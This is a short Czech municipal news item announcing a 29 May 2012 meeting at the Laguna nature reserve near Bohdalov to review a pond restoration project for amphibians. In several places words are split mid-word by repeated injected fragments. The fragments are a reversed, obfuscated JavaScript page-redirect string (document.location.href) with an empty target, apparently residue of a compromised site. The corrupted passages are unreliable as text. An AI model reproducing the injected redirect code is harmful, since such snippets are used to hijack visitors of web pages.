Bohdalov, bohdalov, aktuality, setkání, Laguna
Rainbow page separator

Setkání na Laguně

Sobota, 26. května 2012

Bohdalov /Na úterý 29. května připravuje Sdružení Krajina setkání hlavních aktérů projektu obnovy Přírodní památky Laguna u Bohdalova. V roce 2010 a 2011 probíhaly v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokalitě úpravy starých, dlouho neudržovaných tůní, které vznikly po těžbě cihlářské hlíny. Cílem úprav bylo zlepšit podmínky pro výskyt obojživelníků.

Projekt obnovy, realizovaný Sdružením Krajina a financovaný z Operačního programu Životní prostředí, se chýlí k závěru. Smyslem setkání je zhodnotit výsledky díla, na kterém se významnou měrou podílel i Kraj Vysočina.

Je důležité, aby veřejnost dobře chápala smysl aktivit odehrávajících se v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokalitě. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byli na akci přizváni také žáci místní základní školy, pro které je připravena vycházka lokali[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou s odborným výkladem.

Akce se zúčastní radní Kraje Vysočina odpovědný za problemetiku životního prostředí pan Zdeněk Ryšavý, zástupci Odboru životního prostředí, Agentury ochrany přírody a další hosté. Akce je veřejně přístupná, otevřená všem, které dění na té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokalitě zajímá.

Setkání na Laguně – Úterý 29. května – 12:30 hodin – Přírodní památka Laguna u Bohdalova

Připravil:

Tomáš Blažek

Sdružení Krajina

tel: 566 521 259, mobil: 777 045 586, e-mail: blazek@sdruzenikrajina.cz, www.sdruzenikrajina.cz